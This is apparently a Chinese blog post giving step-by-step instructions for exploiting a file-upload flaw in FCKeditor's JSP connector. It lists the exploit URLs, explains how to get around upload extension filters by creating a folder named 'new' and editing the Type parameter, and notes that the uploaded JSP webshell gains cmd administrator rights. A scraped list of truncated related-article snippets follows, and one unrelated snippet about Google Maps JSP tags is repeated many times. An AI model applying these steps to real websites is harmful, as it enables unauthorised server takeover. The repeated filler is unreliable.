http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图
注意红框的地方,是上传后图片存放的地址。
然后用
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:
如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限
版权声明:本文为博主原创文章,未经博主允许不得转载。
分享到:
相关推荐
- 对于不同后端(如JSP)也有相应的漏洞利用方式。 ##### 8. 其他漏洞路径 - **描述**:除了上述提到的漏洞,还有其他一些漏洞路径。 - **示例**: - `FCKeditor/_samples/default.html` - `_samples`目录下的...
本文主要针对Fckeditor存在的若干已知漏洞进行了详细整理,包括如何利用这些漏洞以及可能的安全风险。 #### 二、漏洞概览 Fckeditor存在多种类型的漏洞,主要包括但不限于以下几个方面: 1. **编辑器版本检查**:...
总的来说,“FCKeditor的jsp版(软件+教程)”提供了全面的资源,帮助你利用FCKeditor的强大功能构建富文本编辑功能,提升网站用户体验,同时也能通过教程深入理解其工作原理和使用技巧。无论是初学者还是经验丰富的...
- **JSP版漏洞**:eWebEditor JSP版本的安全问题。 - **2.8商业版插一句话木马**:在eWebEditor 2.8商业版中,攻击者可以插入一句话木马。 - **Net upload.aspx上传漏洞**:eWebEditor Net版本存在文件上传漏洞。 #...
### 漏洞利用过程 攻击者通过构造特定的HTTP POST请求来利用这个漏洞,如示例中所示,使用了多部分表单数据类型(`multipart/form-data`),并通过边界分隔符(如`---------------------------7d91b5041b90`)将...
然而,FCKeditor新闻组件在某些版本中存在安全漏洞,尤其是与文件上传功能相关的connector.aspx文件的漏洞。下面将详细解析FCKeditor新闻组件的程序漏洞及其影响。 首先,提到的CurrentFolder参数,它允许用户在...
- 某些情况下,如果FCKEditor存在安全漏洞,攻击者可以通过构造特殊的URL或请求来绕过原有的限制。 - 例如,通过修改URL中的参数来尝试上传非预期的文件类型。 3. **客户端脚本篡改**: - 对于前端JavaScript...
- **漏洞利用**:实战演练 SQL 注入攻击方法,包括针对不同类型的数据库(如 Access、MSSQL)的利用方式。 - **自动化工具**:学习使用 sqlmap 等自动化工具进行漏洞扫描与利用。 - **JSP 和 Oracle 数据库**:了解 ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...